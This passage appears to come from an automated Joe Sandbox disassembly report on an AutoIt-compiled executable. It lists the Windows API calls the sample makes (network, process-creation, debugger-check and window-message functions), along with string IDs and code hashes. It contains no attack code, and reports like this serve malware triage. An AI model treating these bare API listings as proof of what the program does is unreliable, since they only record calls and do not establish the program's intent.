                                              • Instruction Fuzzy Hash: 595101B5504256EFDF25EF68C481FBA7BA4EF65310F288059E8919B2D0D634DD42CBB0
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 00D8F2A2
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00D8F2BB
                                              Strings
                                              Similarity
                                              • API ID: GlobalMemorySleepStatus
                                              • String ID: @
                                              • API String ID: 2783356886-2766056989
                                              • Opcode ID: f77ff7300c11e246c7e32666d04127725e008b0de1c0134035d29ff5a21e1118
                                              • Instruction ID: 7b09bfa6ef69c7e070799b22204157fe484c6bc23ea3ea13371ea11a78f6a092
                                              • Opcode Fuzzy Hash: f77ff7300c11e246c7e32666d04127725e008b0de1c0134035d29ff5a21e1118
                                              • Instruction Fuzzy Hash: 2C5142724187849FD320AF21DC86BAFBBF8FF95300F81885CF199511A5EB308529CB66
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00DF57E0
                                              • _wcslen.LIBCMT ref: 00DF57EC
                                              Strings
                                              Similarity
                                              • API ID: BuffCharUpper_wcslen
                                              • String ID: CALLARGARRAY
                                              • API String ID: 157775604-1150593374
                                              • Opcode ID: 6acb471d5cac2d610e77b43d31566e8d720f2ec280e24a4f90abff407c57913e
                                              • Instruction ID: cecf9e4a576909aee4f00ee623ff55219cffe20a5724428389cd88e778f7dd56
                                              • Opcode Fuzzy Hash: 6acb471d5cac2d610e77b43d31566e8d720f2ec280e24a4f90abff407c57913e
                                              • Instruction Fuzzy Hash: 1941B331A001099FCB14DFA8E8818BEBBB5EF59350F158169F605A7295E7309D81CBB0
                                              APIs
                                              • _wcslen.LIBCMT ref: 00DED130
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00DED13A
                                              Strings
                                              Similarity
                                              • API ID: CrackInternet_wcslen
                                              • String ID: |
                                              • API String ID: 596671847-2343686810
                                              • Opcode ID: 6865e5c916a6d439fe66ed885a8ee6d1acb418ac57111cc309be0db8bf8c1779
                                              • Instruction ID: 1cec7b494e995d4a44e8bc9ae5651c841e4ebb93417e62ca86f53a1ba26ef656
                                              • Opcode Fuzzy Hash: 6865e5c916a6d439fe66ed885a8ee6d1acb418ac57111cc309be0db8bf8c1779
                                              • Instruction Fuzzy Hash: EE310D71D00219ABCF15EFA5CC85AEE7FBAFF04340F104019F819A6165EB31A956DB71
                                              APIs
                                              • DestroyWindow.USER32(?,?,?,?), ref: 00E03621
                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E0365C
                                              Strings
                                              Similarity
                                              • API ID: Window$DestroyMove
                                              • String ID: static
                                              • API String ID: 2139405536-2160076837
                                              • Opcode ID: 23b64de7827e57308ac27126fc3ae26cabf4b6b2ef73b8bc7aea9d8e4ff4e3c1
                                              • Instruction ID: 89c33ae41b43880510022d14af6003549d7c719dc9fce95d764a06f7b109e76c
                                              • Opcode Fuzzy Hash: 23b64de7827e57308ac27126fc3ae26cabf4b6b2ef73b8bc7aea9d8e4ff4e3c1
                                              • Instruction Fuzzy Hash: B4318D71110604AEDB24DF78DC80EFB73ADFF98724F10A619F9A5A7290DA31AD91C760
                                              APIs
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00E0461F
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E04634
                                              Strings
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: '
                                              • API String ID: 3850602802-1997036262
                                              • Opcode ID: 622b980354947f6399ce98c55b0a52e4e542ef456df49d85816f292a140dffab
                                              • Instruction ID: 77129484db4dc7933a221c1418c275cb4878092f7db43ff1e37a2463bae3dd8f
                                              • Opcode Fuzzy Hash: 622b980354947f6399ce98c55b0a52e4e542ef456df49d85816f292a140dffab
                                              • Instruction Fuzzy Hash: D53139B5A013099FDF14CFA9DA80BDA7BB5FF49304F105069EA04AB381E771A981CF90
                                              APIs
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E0327C
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E03287
                                              Strings
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: Combobox
                                              • API String ID: 3850602802-2096851135
                                              • Opcode ID: 0972d07a0f620816c8fdca3d60a3f1678e778b23b333295f20f99e45a1ab8a66
                                              • Instruction ID: 3c8d53e1b4ce8dd2a9260417ee8712c7adf10ba47738c430bc99d8092b348374
                                              • Opcode Fuzzy Hash: 0972d07a0f620816c8fdca3d60a3f1678e778b23b333295f20f99e45a1ab8a66
                                              • Instruction Fuzzy Hash: ED1193712002087FEF259FA4DC85EBB376EEB54368F105525F518A72E1D6319D918760
                                              APIs
                                                • Part of subcall function 00D7600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D7604C
                                                • Part of subcall function 00D7600E: GetStockObject.GDI32(00000011), ref: 00D76060
                                                • Part of subcall function 00D7600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D7606A
                                              • GetWindowRect.USER32(00000000,?), ref: 00E0377A
                                              • GetSysColor.USER32(00000012), ref: 00E03794
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                              • String ID: static
                                              • API String ID: 1983116058-2160076837
                                              • Opcode ID: 41814cbff8ac7d61b9ea651d2702ca154fc1dcf4c06eb4dd69387333148d0174
                                              • Instruction ID: 6ebb45463d25c9209d106b6abb3692ce6693295674ccbf30bec53866e3a52540
                                              • Opcode Fuzzy Hash: 41814cbff8ac7d61b9ea651d2702ca154fc1dcf4c06eb4dd69387333148d0174
                                              • Instruction Fuzzy Hash: 081129B2610209AFDF00DFB8CC45AEA7BB8EB08314F145A15F955E2290E735E8959B60
                                              APIs
                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DECD7D
                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DECDA6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Internet$OpenOption
                                              • String ID: <local>
                                              • API String ID: 942729171-4266983199
                                              • Opcode ID: 55d58c4fbd328036617b76c9014e684a41606e956a6c7b7cc3f8b0cc03ee5327
                                              • Instruction ID: 9b91f4ff0f58906f346d4be07591bfbccc6cc6290a7aaa8d4dd0bfb9044a090f
                                              • Opcode Fuzzy Hash: 55d58c4fbd328036617b76c9014e684a41606e956a6c7b7cc3f8b0cc03ee5327
                                              • Instruction Fuzzy Hash: E4110271221671BAD7386B678C48EE7BEACEF127A4F00522AB14993080D3729846D6F0
                                              APIs
                                              • GetWindowTextLengthW.USER32(00000000), ref: 00E034AB
                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E034BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LengthMessageSendTextWindow
                                              • String ID: edit
                                              • API String ID: 2978978980-2167791130
                                              • Opcode ID: 5a538c614e56beaf91eb4caffba2d8e11b4b90ec8d2146b8dd673cf393b9159b
                                              • Instruction ID: 9c81a88e5cbbae1076642f157b36daaae0f50ac362c0babe9285dc98e47d19bb
                                              • Opcode Fuzzy Hash: 5a538c614e56beaf91eb4caffba2d8e11b4b90ec8d2146b8dd673cf393b9159b
                                              • Instruction Fuzzy Hash: A9119D71100208AEEB114F74DC40AEA376EEB05378F606324F970AB1D0C771DCD19761
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • CharUpperBuffW.USER32(?,?,?), ref: 00DD6CB6
                                              • _wcslen.LIBCMT ref: 00DD6CC2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$BuffCharUpper
                                              • String ID: STOP
                                              • API String ID: 1256254125-2411985666
                                              • Opcode ID: 15c41e205282cd2ad5af97be1f60f05cd0ece13cb2c0682e70c5d549d975896a
                                              • Instruction ID: 29994c620e8db534945fb38317513b552fa8062356bae3aa4769fa31c82e573e
                                              • Opcode Fuzzy Hash: 15c41e205282cd2ad5af97be1f60f05cd0ece13cb2c0682e70c5d549d975896a
                                              • Instruction Fuzzy Hash: 880104326105268ACB209FFDDC818BF7BA5EB60710714052AE85292291FB31D844C6B0
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DD3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DD3CCA
                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DD1D4C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: e818b595b041bddfa48853671fd73a5393c50f20104940a2d7aca8b7bff4e686
                                              • Instruction ID: 40e8b2922a5bea426f9f2995adcc9268b84b5ba58141f61534c320571aca0693
                                              • Opcode Fuzzy Hash: e818b595b041bddfa48853671fd73a5393c50f20104940a2d7aca8b7bff4e686
                                              • Instruction Fuzzy Hash: 44012876600228BBCB14EBA4CC15CFEB769EB12350F04060AF866673C1EB315908C671
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DD3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DD3CCA
                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00DD1C46
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: 73d4be9dc9c06ad78554c204d038fa3c8d292d6a1af9ecef4eeb6e8ea1388064
                                              • Instruction ID: 086fcc1366a06323f11192d0bae786740514247f250e9a2d4a8c3a69fdf39dff
                                              • Opcode Fuzzy Hash: 73d4be9dc9c06ad78554c204d038fa3c8d292d6a1af9ecef4eeb6e8ea1388064
                                              • Instruction Fuzzy Hash: F501A7767912047ADF14EB94CD66DFFF7A8DB11340F14001AA40677382EA219E18C6B2
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DD3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DD3CCA
                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00DD1CC8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: 263b67eb5f1f195fe5b5864011bb08a8c860356f4048781db309107c474233a0
                                              • Instruction ID: e8685af1f1db4577c3a0f85ae6b2211380438cf9810ea8428d2ae1b7b4b04aac
                                              • Opcode Fuzzy Hash: 263b67eb5f1f195fe5b5864011bb08a8c860356f4048781db309107c474233a0
                                              • Instruction Fuzzy Hash: 090162B679121876CB15EBA9CE16EFEF7A8DB11340F140016B84673381EA619F18C672
                                              APIs
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E43018,00E4305C), ref: 00E081BF
                                              • CloseHandle.KERNEL32 ref: 00E081D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: \0
                                              • API String ID: 3712363035-3218720685
                                              • Opcode ID: e8b2efecc81ea3318603382e71b709191b52ddd32d22564ab099ad559130157b
                                              • Instruction ID: 6cf119c8408ef343723706a4e5d8dbcf0d8eb58602db3b6a497e1afc669b8f7e
                                              • Opcode Fuzzy Hash: e8b2efecc81ea3318603382e71b709191b52ddd32d22564ab099ad559130157b
                                              • Instruction Fuzzy Hash: 4BF0E2B5640300BEE7206732AC06FB73A8CDB05750F000120BB48F50E2D67A9E4983F8
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: 3, 3, 16, 1
                                              • API String ID: 176396367-3042988571
                                              • Opcode ID: 9f6c06b12c1c4a55d6c6ff0d543e7cc583e06a4c6a18aad06d4ac50e3e7f2f3a
                                              • Instruction ID: 534b08408fee2e8246e4af8865f445d630ad6c0190d592b8455a178b6a8f13c1
                                              • Opcode Fuzzy Hash: 9f6c06b12c1c4a55d6c6ff0d543e7cc583e06a4c6a18aad06d4ac50e3e7f2f3a
                                              • Instruction Fuzzy Hash: 1EE02B022043242093312279DCC1DBF5689CFC9760715182FFA85C2267EA948D9293B0
                                              APIs
                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00DD0B23
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Message
                                              • String ID: AutoIt$Error allocating memory.
                                              • API String ID: 2030045667-4017498283
                                              • Opcode ID: 107bb832b2e7e23358332076acc678d8f1c997ceeae4df3282db84ec1770ddd0
                                              • Instruction ID: 0b764c7cdc013b66164dc2770d61210018b4f099057df07dd100373f4d47a498
                                              • Opcode Fuzzy Hash: 107bb832b2e7e23358332076acc678d8f1c997ceeae4df3282db84ec1770ddd0
                                              • Instruction Fuzzy Hash: 2BE0D8322443087AD21437947C07F897BC4CF05B51F20042BF758655C38AD264D046B9
                                              APIs
                                                • Part of subcall function 00D8F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(00E40A88,00000000,00E40A74,00D90D71,?,?,?,00D7100A), ref: 00D8F7CE
                                              • IsDebuggerPresent.KERNEL32(?,?,?,00D7100A), ref: 00D90D75
                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D7100A), ref: 00D90D84
                                              Strings
                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D90D7F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                              • API String ID: 55579361-631824599
                                              • Opcode ID: 1560b5a7b36c1ce4170a3d957b4d2336d0bf91828e6ee74efdafea95e14d02cd
                                              • Instruction ID: 5dd0b1053168bf56497e734ee002bfe9639ce1803f27b636662bec6e9f9aaea7
                                              • Opcode Fuzzy Hash: 1560b5a7b36c1ce4170a3d957b4d2336d0bf91828e6ee74efdafea95e14d02cd
                                              • Instruction Fuzzy Hash: F1E065742007018FD7309F79E4043427FE4EB00750F04892DE496D6A91DBB1E4898BB1
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00D8E3D5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID: 0%$8%
                                              • API String ID: 1385522511-2949748613
                                              • Opcode ID: 66841c83c2e57634ff0a4ae0d5349db8077c65e7665815435cd85d381d71ecba
                                              • Instruction ID: 384068ac53571d49be831842b535d0d3ec2fb1571dc3158a05ec1e453368c223
                                              • Opcode Fuzzy Hash: 66841c83c2e57634ff0a4ae0d5349db8077c65e7665815435cd85d381d71ecba
                                              • Instruction Fuzzy Hash: 55E02635500A10CFCB04B719B855A883351EB4A321B90916DF302A71D19B382C428B7A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: %.3d$X64
                                              • API String ID: 481472006-1077770165
                                              • Opcode ID: 00d67c6c8c505af702d809f9f4e9b016fa41b32af963e1267bcb2dc6023991c2
                                              • Instruction ID: 3ecca3887c7d179a5d4abff43021f6acb2676cbccbad1133db3434e9889029b0
                                              • Opcode Fuzzy Hash: 00d67c6c8c505af702d809f9f4e9b016fa41b32af963e1267bcb2dc6023991c2
                                              • Instruction Fuzzy Hash: 49D012A1C0810AE9CB50A7D0CC49EBAF3BDEB09301F608476F886A3040E634D549AB75
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E0236C
                                              • PostMessageW.USER32(00000000), ref: 00E02373
                                                • Part of subcall function 00DDE97B: Sleep.KERNEL32 ref: 00DDE9F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: 71be0cf9695f99dd47e54d42c614fe840bb4c741e1fd9c6d76b271035b1eb5c1
